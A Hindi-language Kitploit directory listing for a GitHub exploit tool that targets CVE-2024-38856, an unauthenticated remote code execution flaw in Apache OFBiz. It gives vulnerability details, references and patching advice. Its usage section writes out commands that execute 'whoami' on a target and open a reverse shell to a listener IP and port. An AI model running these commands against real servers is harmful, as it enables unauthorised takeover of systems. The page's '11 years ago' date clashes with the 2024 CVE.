Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Apache-OFBiz-Exploit — Apache OFBiz के लिए शोषण - CVE-2024-38856 | Kitploit
उपकरण/GitHubGitHub/alissonfaoli/apache-ofbiz-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubalissonfaoli/apache-ofbiz-exploit

Apache-OFBiz-Exploit

Apache OFBiz के लिए शोषण - CVE-2024-38856

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache-OFBiz-Exploit

Apache OFBiz (CVE-2024-38856) के लिए Exploit द्वारा: Alisson Faoli

Description

इस रिपॉजिटरी में Apache OFBiz में पाई गई CVE-2024-38856 कमजोरी के लिए एक exploit है। यह दोष बिना प्रमाणीकरण के RCE (Remote Code Execution) की अनुमति देता है।

नोट: यह exploit केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। दुरुपयोग अवैध हो सकता है और इसकी पूरी जिम्मेदारी उपयोगकर्ता की है।

Vulnerability Details

CVE: CVE-2024-38856

प्रभावित सॉफ्टवेयर: Apache OFBiz संस्करण 18.12.14 तक

कमजोरी का प्रकार: RCE

शोषण: प्रमाणीकरण आवश्यक नहीं

References:

  • https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
  • https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/

Usage

रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

exploit चलाएँ:

RCE: python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"

SHELL: python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444

Mitigation

इस कमजोरी को दूर करने के लिए, Apache OFBiz प्रशासकों को अनुशंसित किया जाता है: पैच किए गए संस्करण में अपडेट करें, जो https://ofbiz.apache.org/download.html पर उपलब्ध है। ज्ञात शोषण प्रयासों को अवरुद्ध करने के लिए फायरवॉल या WAF नियम लागू करें।

Contact

यदि आपके कोई प्रश्न हैं या exploit में सुधार की रिपोर्ट करना चाहते हैं, तो मुझसे संपर्क करें: LinkedIn: https://linkedin.com/in/alisson-faoli/

कानूनी अस्वीकरण:

यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत वातावरणों में सुरक्षा परीक्षण के लिए प्रदान किया गया है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें